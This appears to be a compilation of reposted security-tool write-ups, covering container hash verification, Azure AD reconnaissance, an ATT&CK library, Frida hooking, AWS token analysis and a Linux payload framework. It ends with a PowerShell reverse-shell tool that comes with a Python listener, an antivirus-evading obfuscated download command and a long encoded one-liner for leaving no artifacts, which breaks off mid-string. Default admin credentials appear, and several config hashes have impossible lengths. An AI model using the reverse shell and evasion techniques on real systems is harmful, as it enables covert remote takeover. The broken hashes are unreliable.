[*] Inspecting Layer: f2d913644763b53196cfd2597f21b9739535ef9d5bf9250b9fa21ed223fc29e3
echo $?
1

Example 3
Terrier is instructed to analyze and verify the contents of the container's merged contents located at "merged", where merged is typically located at /var/lib/docker/overlay2/..../merged. An example YAML file for this scenario might look like this:
mode: container
verbose: true
# veryverbose: true
# image: latestgo13.tar
path: merged

files:
  - name: '/usr/local/bin/analysis.sh'
    hashes:
      - hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
  - name: '/usr/local/go/bin/go'
    hashes:
      - hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
  - name: '/usr/local/bin/staticcheck'
    hashes:
      - hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'
  - name: '/usr/local/bin/gosec'
    hashes:
      - hash: 'e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f'
  - name: '/usr/local/bin/errcheck'
    hashes:
      - hash: '41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7'
  - name: '/var/lib/dpkg/info/apt.postrm'
    hashes:
      - hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'
Running Terrier to analyse the running Container.
[+] Loading config: cfg.yml
[+] Analysing Container
[!] Found matching instance of '/usr/local/bin/analysis.sh' at: merged/usr/local/bin/analysis.sh with hash:9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105
[!] Found matching instance of '/usr/local/bin/errcheck' at: merged/usr/local/bin/errcheck with hash:41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7
[!] Found matching instance of '/usr/local/bin/gosec' at: merged/usr/local/bin/gosec with hash:e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f
[!] Found matching instance of '/usr/local/bin/staticcheck' at: merged/usr/local/bin/staticcheck with hash:73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2
[!] Found matching instance of '/usr/local/go/bin/go' at: merged/usr/local/go/bin/go with hash:23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495
[!] Found matching instance of '/var/lib/dpkg/info/apt.postrm' at: merged/var/lib/dpkg/info/apt.postrm with hash:6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c
[!] All components were identified and verified: (6/6)

Integrating with CI
Terrier has been designed to assist in the prevention of supply chain attacks. To utilise Terrier with CIs such as GitHub Actions or CircleCI, the following example configurations might be useful.

CircleCI Example
config.yml
version: 2
jobs:
  build:
    machine: true
    steps:
      - checkout
      - run:
          name: Build Docker Image
          command: |
            docker build -t builditall .
      - run:
          name: Save Docker Image Locally
          command: |
            docker save builditall -o builditall.tar
      - run:
          name: Verify Docker Image Binaries
          command: |
            ./terrier_linux_amd64
Terrier cfg.yml
mode: image
image: builditall.tar
files:
  - name: '/bin/wget'
    hashes:
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
      - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2a'
      - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41a'
  - name: '/sbin/sulogin'
    hashes:
      - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'

Github Actions Example
go.yml
name: Go
on: [push]
jobs:
  build:
    name: Build
    runs-on: ubuntu-latest
    steps:
      - name: Get Code
        uses: actions/checkout@master
      - name: Build Docker Image
        run: |
          docker build -t builditall .
      - name: Save Docker Image Locally
        run: |
          docker save builditall -o builditall.tar
      - name: Verify Docker Image Binaries
        run: |
          ./terrier_linux_amd64
Terrier cfg.yml
mode: image
image: builditall.tar
files:
  - name: '/bin/wget'
    hashes:
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
      - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2a'
      - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41a'
  - name: '/bin/sbin/sulogin'
    hashes:
      - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'

Converting SHASUM 256 Hashes to a Terrier Config File
Sometimes SHA256 hashes are produced by other tools in the following format:
6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c  ./var/lib/dpkg/info/apt.postrm
6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2 ./var/lib/dpkg/info/mawk.postinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.preinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.postrm
8a278d8f860ef64ae49a2d3099b698c79dd5184db154fdeaea1bc7544c2135df ./var/lib/dpkg/info/debconf.postrm
1e6edefb6be6eb6fe8dd60ece5544938197b2d1d38a2d4957c069661bc2591cd ./var/lib/dpkg/info/base-files.prerm
198c13dfc6e7ae170b48bb5b997793f5b25541f6e998edaec6e9812bc002915f ./var/lib/dpkg/info/passwd.postinst
The format above contains the data Terrier needs, but in the wrong shape. We have included a script called convertSHA.sh which can be used to convert a file with file paths and hash values, as seen above, into a valid Terrier config file.
This can be seen in the following example:
# cat hashes-SHA256.txt
6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c ./var/lib/dpkg/info/apt.postrm
6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2 ./var/lib/dpkg/info/mawk.postinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.preinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.postrm
8a278d8f860ef64ae49a2d3099b698c79dd5184db154fdeaea1bc7544c2135df ./var/lib/dpkg/info/debconf.postrm
1e6edefb6be6eb6fe8dd60ece5544938197b2d1d38a2d4957c069661bc2591cd ./var/lib/dpkg/info/base-files.prerm
198c13dfc6e7ae170b48bb5b997793f5b25541f6e998edaec6e9812bc002915f ./var/lib/dpkg/info/passwd.postinst

# ./convertSHA.sh hashes-SHA256.txt output.yml
Converting hashes-SHA256.txt to Terrier YML: output.yml

# cat output.yml
mode: image
#mode: container
image: image.tar
#path: path/to/container/merged
#verbose: true
#veryverbose: true
files:
  - name: '/var/lib/dpkg/info/apt.postrm'
    hashes:
      - hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'
  - name: '/var/lib/dpkg/info/mawk.postinst'
    hashes:
      - hash: '6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2'
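The same conversion can be sketched in a few lines of Python (a hypothetical equivalent of convertSHA.sh, assuming the two-column "hash path" input shown above):

import sys

def convert(infile):
    # Emit a minimal Terrier config; header values mirror the template above
    print("mode: image")
    print("image: image.tar")
    print("files:")
    for line in open(infile):
        parts = line.split()
        if len(parts) != 2:
            continue  # skip malformed lines
        digest, path = parts
        print("- name: '%s'" % path.lstrip("."))
        print("  hashes:")
        print("  - hash: '%s'" % digest)

convert(sys.argv[1])

Usage: python convert.py hashes-SHA256.txt > output.yml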


ROADtools - The Azure AD Exploration Framework


(Rogue Office 365 and Azure (active) Directory tools)

ROADtools is a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool.

ROADlib

ROADlib is a library that can be used to authenticate with Azure AD or to build tools that integrate with a database containing ROADrecon data. The database model in ROADlib is automatically generated based on the metadata definition of the Azure AD internal API. ROADlib lives in the ROADtools namespace, so to import it in your scripts use from roadtools.roadlib import X
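For instance, pulling in the authentication helper might look like this (a sketch only; the auth submodule and Authentication class are assumptions for illustration, not documented API):

# hypothetical import following the roadtools.roadlib namespace convention
from roadtools.roadlib.auth import Authentication

auth = Authentication()  # would drive Azure AD authentication for your tool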

ROADrecon

ROADrecon is a tool for exploring information in Azure AD from both a Red Team and Blue Team perspective. In short, this is what it does:
  • Uses an automatically generated metadata model to create an SQLAlchemy backed database on disk.
  • Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database.
  • Provide plugins to query this database and output it to a useful format.
  • Provide an extensive interface built in Angular that queries the offline database directly for its analysis.
ROADrecon uses async Python features and is only compatible with Python 3.6-3.8 (development is done with Python 3.8).

Installation
There are multiple ways to install ROADrecon:
Using a published version on PyPi
Stable versions can be installed with pip install roadrecon. This will automatically add the roadrecon command to your PATH.
Using a version from GitHub
Every commit to master is automatically built into a release version with Azure Pipelines. This ensures that you can install the latest version of the GUI without having to install npm and all its dependencies. Simply download the roadlib and roadrecon zip files from the Azure Pipelines artifacts, then unzip both and install them in the correct order (roadlib first):
pip install roadlib/
pip install roadrecon/
You can also install them in development mode with pip install -e roadlib/.
Developing the front-end
If you want to make changes to the Angular front-end, you will need to have node and npm installed. Then install the components from git:
git clone https://github.com/dirkjanm/roadtools.git
pip install -e roadlib/
pip install -e roadrecon/
cd roadrecon/frontend/
npm install
You can run the Angular frontend with npm start or ng serve using the Angular CLI from the roadrecon/frontend/ directory. To build the JavaScript files into ROADrecon's dist_gui directory, run npm build.

Developing
See this README for more info.


Elemental - A MITRE ATT&CK Threat Library


Elemental is a centralized threat library of MITRE ATT&CK techniques, Atomic Red Team tests, and over 280 Sigma rules. It provides an alternative way to explore the ATT&CK dataset, mapping relevant Atomic Red Team tests and Sigma rules to their respective technique. Elemental allows defenders to create custom ATT&CK Techniques and upload Sigma Rules. The ATT&CK dataset was collected via the hunters-forge attackcti Python client. Atomic Red Team tests were imported from the Atomic Red Team GitHub repository. Sigma rules were imported from Sigma's GitHub rule collection if they contained ATT&CK tags.
This platform was conceived as a capstone project for the University of California, Berkeley's Master of Information and Cybersecurity program. We look forward to community feedback for new ideas and improvements. This instance of Elemental is experimental and not configured for production deployment. Please see the Django documentation on configuring a production server.

Features
  • View ATT&CK Technique information
  • View Atomic Red Team tests in Markdown and Yaml
  • View Sigma rules in Yaml
  • Add new ATT&CK Techniques (currently only available from Django Admin panel)
  • Upload new Sigma rules (currently only available from Django Admin panel)

Screenshots
Main Elements View


Technique View


Atomics View


Sigma Rules View

Installation
git clone https://github.com/Elemental-attack/Elemental.git
cd Elemental/elemental
pip install -r requirements.txt
python manage.py runserver
Default Django admin page credentials: user: elemental | password: berkelium

Thanks
Mitre ATT&CK - https://github.com/mitre/cti
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Python Client - https://github.com/hunters-forge/ATTACK-Python-Client
Sigma - https://github.com/Neo23x0/sigma

TODO
  • Log Source mapping for Techniques and Sigma rules
  • Custom Techniques add
  • Custom Sigma Rules upload
  • Sigmac to convert rules to desired SIEM
  • Filter capabilities on Elements page
  • Integrate update functionality for ATT&CK, Atomic Red Team, and Sigma rules repo

Authors


Runtime Mobile Security (RMS) - A Powerful Web Interface That Helps You To Manipulate Android Java Classes And Methods At Runtime


Runtime Mobile Security (RMS), powered by FRIDA, is a powerful web interface that helps you to manipulate Android Java Classes and Methods at Runtime.
You can easily dump all the loaded classes and relative methods, hook everything on the fly, trace method args and return values, load custom scripts, and do many other useful things.

by @mobilesecurity_

General Info
Runtime Mobile Security (RMS) is currently supporting Android devices only.
It has been tested on MacOS and with the following devices:
  • AVD emulator
  • Genymotion emulator
  • Amazon Fire Stick 4K
It should also work well on Windows and Linux, but some minor adjustments may be needed.
Do not connect more than one device at a time; RMS is not that smart at the moment.

Prerequisites
FRIDA server up and running on the target device
Refer to the official FRIDA guide for the installation: https://frida.re/docs/android/
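Before starting RMS, you can quickly confirm the server is reachable using the frida Python bindings (a minimal sketch; assumes pip-installed frida and one USB-connected device or emulator):

import frida

# Raises an exception if no USB device with a running frida-server is found
device = frida.get_usb_device(timeout=5)
for proc in device.enumerate_processes()[:5]:
    print(proc.pid, proc.name)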

Known issues
  • Sometimes RMS fails to load complex methods. Use a filter when this happens, or feel free to improve the algorithm (default.js).
  • Code is not optimized

Improvements
  • iOS support
  • Feel free to send me your best JS scripts via a pull request. I'll be happy to bundle the best ones as default scripts in the next RMS release, e.g.
    • root detection bypass
    • ssl pinning bypass
    • reflection detection
    • etc...

Installation
  1. (optional) Create a python virtual environment
  2. pip3 install -r requirements.txt
  3. python3 mobilesecurity.py

Usage

1. Run your favorite app by simply inserting its package name
NOTE: RMS attaches to a persistent process called com.android.systemui to get the list of all the classes that are already loaded in memory before the launch of the target app. If you have an issue with it, try to find a different package that works well on your device. You can set another default package by simply editing the config.json file.


2. Check which Classes and Methods have been loaded in memory


3. Hook Classes/Methods on the fly and trace their args and return values



4. Select a Class and generate on the fly a hook template for all its methods



5. Easily detect new classes that have been loaded in memory


6. Inject your favorite FRIDA CUSTOM SCRIPTS on the fly
Just add your .js files inside the custom_script folder and they will be automatically loaded by the web interface ready to be executed.


Acknowledgements
Special thanks to the following Open Source projects for the inspiration:
RootBeer Sample is the DEMO app used to show how RMS works. RootBeer is an amazing root detection library. I decided to use the sample app as the DEMO just to show that, like every client-side-only check, its root detection logic can be easily bypassed if not combined with server-side validation.


SkyWrapper - Tool That Helps To Discover Suspicious Creation Forms And Uses Of Temporary Tokens In AWS


SkyWrapper is an open-source project which analyzes the behavior of temporary tokens created in a given AWS account. The tool aims to find suspicious creation forms and uses of temporary tokens, to detect malicious activity in the account. The tool analyzes the AWS account and creates an Excel sheet that includes all the currently living temporary tokens. A summary of the findings is printed to the screen after each run.

SkyWrapper DEMO:


Usage
  1. Fill in the required data in the config file
  2. Make sure your user has the required permissions for running the script (you can check this in IAM on the user's summary page)
  3. Run the Python script
python SkyWrapper.py

Permissions
To run this script, you will need at least the following permissions policy:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "S3TrailBucketPermissions",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucketMultipartUploads",
                "s3:ListBucket",
                "s3:GetBucketLocation",
                "s3:ListMultipartUploadParts"
            ],
            "Resource": [
                "arn:aws:s3:::{cloudtrail_bucket_name}/*",
                "arn:aws:s3:::{cloudtrail_bucket_name}"
            ]
        },
        {
            "Sid": "IAMReadPermissions",
            "Effect": "Allow",
            "Action": [
                "iam:ListAttachedRolePolicies",
                "iam:ListRolePolicies",
                "iam:GetRolePolicy",
                "iam:GetPolicyVersion",
                "iam:GetPolicy",
                "iam:ListRoles"
            ],
            "Resource": [
                "arn:aws:iam::*:policy/*",
                "arn:aws:iam::*:role/*"
            ]
        },
        {
            "Sid": "GLUEReadWritePermissions",
            "Effect": "Allow",
            "Action": [
                "glue:CreateTable",
                "glue:CreateDatabase",
                "glue:GetTable",
                "glue:GetDatabase"
            ],
            "Resource": "*"
        },
        {
            "Sid": "CLOUDTRAILReadPermissions",
            "Effect": "Allow",
            "Action": [
                "cloudtrail:DescribeTrails"
            ],
            "Resource": "*"
        },
        {
            "Sid": "ATHENAReadPermissions",
            "Effect": "Allow",
            "Action": [
                "athena:GetQueryResults",
                "athena:StartQueryExecution",
                "athena:GetQueryExecution"
            ],
            "Resource": "arn:aws:athena:*:*:workgroup/*"
        },
        {
            "Sid": "S3AthenaResultsBucketPermissions",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:ListBucketMultipartUploads",
                "s3:CreateBucket",
                "s3:ListBucket",
                "s3:GetBucketLocation",
                "s3:ListMultipartUploadParts"
            ],
            "Resource": "arn:aws:s3:::aws-athena-query-results-*"
        }
    ]
}
Make sure you replace "{cloudtrail_bucket_name}" with your trail's bucket name!
In case you have more than one trail that you want to run the script on, you have to add those trails' buckets to the policy's resource section as well.

Configuration
"config.yaml" is the configuration file. In most cases, you can leave the configuration as is. In case you need to change it, the configuration file is documented.
athena: # Athena configuration
  database_name: default # The name of the database Athena uses for querying the trail bucket
  table_name: cloudtrail_logs_{table_name} # The table name of the trail bucket
  output_location: s3://aws-athena-query-results-{account_id}-{region}/ # The default output location bucket for the query results
output:
  excel_output_file: run_results_{trail}_{account_id}-{date}.xlsx # Excel results file
  summary_output_file: run_summary_{trail}_{account_id}-{date}.txt # Summary text results file
verify_https: True # Enable/disable verification of SSL certificates for HTTP requests
account:
  account_id: 0 # The account id - keep it as 0 in case you don't know it
  aws_access_key_id: # If you keep it empty, the script will look for the default AWS credentials stored in ~/.aws/credentials
  aws_secret_access_key: # If you keep it empty, the script will look for the default AWS credentials stored in ~/.aws/credentials
  aws_session_token: # If you keep it empty, the script will look for the default AWS credentials stored in ~/.aws/credentials

References:
For more comments, suggestions, or questions, you can contact Omer Tsarfati (@OmerTsarfati) and CyberArk Labs. You can find more projects developed by us at https://github.com/cyberark/.


Thoron Framework - Tool To Generate Simple Payloads To Provide Linux TCP Attack


About Thoron Framework
Thoron Framework is a Linux post-exploitation framework that exploits
Linux TCP vulnerabilities to get a shell-like connection. Thoron Framework
is used to generate simple payloads that provide a Linux TCP attack.

Getting started

Thoron installation
cd thoron
chmod +x install.sh
./install.sh

Thoron uninstallation
cd thoron
chmod +x uninstall.sh
./uninstall.sh

Thoron Framework execution
To execute Thoron Framework, run the following command.
thoron

Why Thoron Framework
  • Simple and clear UX/UI.
Thoron Framework has a simple and clear UX/UI. 
It is easy to understand and it will be easier
for you to master the Thoron Framework.
  • A lot of different payloads.
There are a lot of different payloads in Thoron 
Framework such as Shell, Python and C payloads.
  • Powerful ThorCat listener.
There is a powerful ThorCat listener in Thoron 
Framework that supports secure SSL connection
and other useful functions.


Thoron Framework disclaimer
Usage of the Thoron Framework for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



INTERCEPT - Policy As Code Static Analysis Auditing


Stupidly easy to use, small-footprint Policy as Code subsecond command-line scanner that leverages the power of the fastest multi-line search tool to scan your codebase. It can be used as a linter, guard-rail control or simple data collector and inspector. Consider it a weaponized ripgrep. Works on Mac, Linux and Windows.

How it works
  • intercept binary
  • policies yaml file
  • (included) latest ripgrep binary
  • (optional) exceptions yaml file
Intercept merges environment flags, the policies yaml and the exceptions yaml to generate a global config. It uses ripgrep to recursively scan a target path for policy breaches against your code and generates a human-readable, detailed output of the findings.

Use cases
  • A simple and powerful free drop-in alternative to Hashicorp Sentinel, if you are more comfortable writing and maintaining regular expressions than using a new custom policy language.
  • Do you find Open Policy Agent rego files too much sugar for your pipeline?
  • Captures the patterns from git-secrets and trufflehog and can prevent sensitive information from running through your pipeline. (trufflehog regex)
  • Identifies policy breaches (files and line numbers) and reports solutions/suggestions for its findings, making it a great tool to ease onboarding developer teams onto your unified deployment pipeline.
  • Can enforce style guides, coding standards and best practices, and also report on suboptimal configurations.
  • Can collect patterns or high-entropy data and output them in multiple formats.
  • Anything you can crunch with a regular expression can be actioned on.

Latest Release:
  # Standard package (intercept + ripgrep) for individual platforms
-- intercept-rg-linux.zip
-- intercept-rg-macos.zip
-- intercept-rg-win.zip

# Clean package (intercept only) for individual platforms
-- core-intercept-linux.zip
-- core-intercept-macos.zip
-- core-intercept-win.zip

# Full package (intercept + ripgrep) for all platforms
-- x-intercept.zip

# Package needed to fully use the Makefile
-- setup-buildpack.zip

# Package of the latest compatible release of ripgrep (doesn't include intercept)
-- i-ripgrep-linux.zip
-- i-ripgrep-macos.zip
-- i-ripgrep-win.zip

Download the standard package for your platform to get started

Used in production
INTERCEPT was created to lint thousands of infra deployments a day with minor human intervention; the first MVP has been running for a year already with no reported flaws. Keep in mind INTERCEPT is not, and does not pretend to be, a security tool. It's easy to circumvent a regex pattern once you know it, but the main objective of this tool is to proactively help developers fix their code and assist with style suggestions to keep the codebase clean and avoid trivial support tickets for the uneducated crowd.

Inspired by

Standing on the shoulders of giants

Why ripgrep ? Why is it fast?
  • It is built on top of Rust's regex engine. Rust's regex engine uses finite automata, SIMD and aggressive literal optimizations to make searching very fast. (PCRE2 support) Rust's regex library maintains performance with full Unicode support by building UTF-8 decoding directly into its deterministic finite automaton engine.
  • It supports searching with either memory maps or by searching incrementally with an intermediate buffer. The former is better for single files and the latter is better for large directories. ripgrep chooses the best searching strategy for you automatically.
  • Applies ignore patterns in .gitignore files using a RegexSet. That means a single file path can be matched against multiple glob patterns simultaneously.
  • It uses a lock-free parallel recursive directory iterator, courtesy of crossbeam and ignore.

Benchmark ripgrep
Tool                    Command                                                  Line count   Time
ripgrep (Unicode)       rg -n -w '[A-Z]+_SUSPEND'                                450          0.106s
git grep                LC_ALL=C git grep -E -n -w '[A-Z]+_SUSPEND'              450          0.553s
The Silver Searcher     ag -w '[A-Z]+_SUSPEND'                                   450          0.589s
git grep (Unicode)      LC_ALL=en_US.UTF-8 git grep -E -n -w '[A-Z]+_SUSPEND'    450          2.266s
sift                    sift --git -n -w '[A-Z]+_SUSPEND'                        450          3.505s
ack                     ack -w '[A-Z]+_SUSPEND'                                  1878         6.823s
The Platinum Searcher   pt -w -e '[A-Z]+_SUSPEND'                                450          14.208s

Tests

Test Suite runs with venom
venom run tests/suite.yml

Vulnerabilities

Scanned with Sonatype Nancy
Audited dependencies: 41, Vulnerable: 0
from Sonatype OSS Index


Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.


PowerShell script for connecting to a remote host.
The remote host will have full control over the client's PowerShell and all its underlying commands.
Tested with PowerShell v5.1.18362.752 on Windows 10 Enterprise OS (64 bit).
Made for educational purposes. I hope it will help!

How to Run
Change the IP address and port number inside the script.
Open PowerShell in \src\ and run the commands shown below.
Set the execution policy:
Set-ExecutionPolicy Unrestricted
Run the script:
.\powershell_reverse_tcp.ps1
Or run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
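The script connects back to a plain TCP listener on the remote host, which the steps above assume you already have (e.g. ncat). As a hedged illustration, here is a minimal Python listener; the port is a placeholder and must match the one configured in the script:

import socket

PORT = 9000  # placeholder: must match the port set in powershell_reverse_tcp.ps1

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", PORT))
srv.listen(1)
conn, addr = srv.accept()
print("Connection from", addr)
try:
    while True:
        output = conn.recv(4096)  # "PS>" prompt and command output
        if not output:
            break
        print(output.decode(errors="replace"), end="")
        conn.sendall((input() + "\n").encode())  # send the next command
finally:
    conn.close()
    srv.close()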

PowerShell Obfuscation
Try to bypass an antivirus or some other security mechanisms by obfuscating your scripts.
You can see such obfuscation in the example below.
Original PowerShell command:
(New-Object Net.WebClient).DownloadFile($url, $out)
Obfuscated PowerShell command:
& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'
Check the original PowerShell script here and the obfuscated one here.
Besides manual obfuscation, the original PowerShell script was also obfuscated with Invoke-Obfuscation. Credits to the author!
Search the Internet for additional methods and obfuscation techniques.
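As a toy illustration of the backtick trick shown above (purely illustrative, not how Invoke-Obfuscation works internally), a generator for the `N`E`T-style tokens might look like this in Python:

def backtick_obfuscate(token):
    # A backtick before a character with no escape meaning is ignored by
    # PowerShell; uppercasing sidesteps escapes such as `n (newline) and `t (tab).
    return "".join("`" + ch for ch in token.upper())

print(backtick_obfuscate("Net.WebClient"))  # `N`E`T`.`W`E`B`C`L`I`E`N`T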

PowerShell Encoded Command
Use the one-liner below if you don't want to leave any artifacts behind.
The encoded script will prompt for input; see the slightly altered script in my other project.
To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -EncodedCommand JABhAGQAZAByACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAEkAUAAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwANAAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7AA0ACgAkAHAAbwByAHQAIAA9ACAAJAAoAFIAZQBhAGQALQBIAG8AcwB0ACAALQBQAHIAbwBtAHAAdAAgACIARQBuAHQAZQByACAAcABvAHIAdAAgAG4AdQBtAGIAZQByACIAKQAuAFQAcgBpAG0AKAApADsADQAKAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwANAAoAaQBmACAAKAAkAGEAZABkAHIALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQAgAC0AbwByACAAJABwAG8AcgB0AC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAKQAgAHsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsADQAKAH0AIABlAGwAcwBlACAAewANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAiADsADQAKAAkAVwByAGkAdABlA   C0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIABHAGkAdABIAHUAYgAgAHIAZQ   BwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwANAAoACQAkAHMAbwBjAGsAZQB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHUAbABsADsADQAKAAkAJABiAHU   
